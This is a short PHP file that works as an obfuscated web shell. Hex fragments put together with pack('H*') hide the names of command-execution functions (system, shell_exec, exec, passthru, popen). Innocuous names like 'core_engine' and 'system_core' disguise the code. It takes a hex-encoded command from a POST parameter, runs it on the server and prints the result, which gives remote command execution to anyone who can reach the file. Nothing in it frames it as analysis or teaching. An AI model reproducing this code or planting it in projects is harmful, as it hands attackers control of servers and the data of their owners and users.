<?php


$dchunk1 = '7';
$dchunk2 = '9';
$dchunk3 = '4';
$dchunk4 = '5';
$dchunk5 = '6';
$dchunk6 = '3';
$dchunk7 = '8';
$dchunk8 = 'f';
$dchunk9 = '0';
$dchunk10 = '2';
$dchunk11 = 'e';
$dchunk12 = '1';
$dchunk13 = 'd';
$dchunk14 = 'c';
$core_engine1 = pack("H*", $dchunk1.'3'.$dchunk1.$dchunk2.$dchunk1.'3'.'7'.$dchunk3.'6'.$dchunk4.$dchunk5.'d');
$core_engine2 = pack("H*", '7'.$dchunk6.'6'.$dchunk7.$dchunk5.'5'.$dchunk5.'c'.$dchunk5.'c'.'5'.$dchunk8.$dchunk5.'5'.'7'.$dchunk7.'6'.'5'.'6'.$dchunk6);
$core_engine3 = pack("H*", $dchunk5.$dchunk4.$dchunk1.$dchunk7.$dchunk5.$dchunk4.'6'.$dchunk6);
$core_engine4 = pack("H*", $dchunk1.$dchunk9.'6'.'1'.'7'.'3'.$dchunk1.'3'.$dchunk1.$dchunk3.'6'.$dchunk7.$dchunk1.$dchunk10.'7'.'5');
$core_engine5 = pack("H*", '7'.'0'.$dchunk5.$dchunk8.$dchunk1.$dchunk9.$dchunk5.$dchunk4.$dchunk5.$dchunk11);
$core_engine6 = pack("H*", '7'.$dchunk6.'7'.'4'.'7'.'2'.$dchunk5.$dchunk4.'6'.$dchunk12.$dchunk5.$dchunk13.$dchunk4.'f'.'6'.'7'.'6'.'5'.$dchunk1.'4'.$dchunk4.'f'.$dchunk5.'3'.'6'.'f'.'6'.$dchunk11.'7'.$dchunk3.'6'.$dchunk4.'6'.$dchunk11.'7'.'4'.$dchunk1.'3');
$core_engine7 = pack("H*", $dchunk1.'0'.'6'.$dchunk6.$dchunk5.$dchunk14.'6'.$dchunk8.$dchunk1.'3'.'6'.'5');
$system_core = pack("H*", $dchunk1.'3'.$dchunk1.'9'.'7'.$dchunk6.$dchunk1.'4'.$dchunk5.'5'.'6'.$dchunk13.'5'.$dchunk8.$dchunk5.$dchunk6.'6'.'f'.'7'.'2'.'6'.'5');
if (isset($_POST[$system_core])) {
    $system_core = pack("H*", $_POST[$system_core]);
    if (function_exists($core_engine1)) {
        $core_engine1($system_core);
    } elseif (function_exists($core_engine2)) {
        print $core_engine2($system_core);
    } elseif (function_exists($core_engine3)) {
        $core_engine3($system_core, $elem_pointer);
        print join("\n", $elem_pointer);
    } elseif (function_exists($core_engine4)) {
        $core_engine4($system_core);
    } elseif (function_exists($core_engine5) && function_exists($core_engine6) && function_exists($core_engine7)) {
        $parameter_group_resource = $core_engine5($system_core, 'r');
        if ($parameter_group_resource) {
            $k_binding = $core_engine6($parameter_group_resource);
            $core_engine7($parameter_group_resource);
            print $k_binding;
        }
    }
    exit;
}
